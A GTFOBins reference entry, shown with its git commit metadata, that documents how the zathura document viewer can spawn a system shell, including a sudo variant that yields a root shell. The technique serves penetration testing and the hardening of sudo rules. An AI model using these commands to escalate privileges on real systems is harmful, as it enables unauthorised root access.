GTFOBins.github.io/_gtfobins/zathura.md
Andrea Cardaci 3cdfea5714 Promote zathura command to shell
Related to #293.
2022-06-08 13:41:44 +02:00

13 lines
283 B
Markdown

---
description: The interaction happens in a GUI window, while the shell is dropped in the terminal.
functions:
shell:
- code: |
zathura
:! /bin/sh -c 'exec /bin/sh 0<&1'
sudo:
- code: |
sudo zathura
:! /bin/sh -c 'exec /bin/sh 0<&1'
---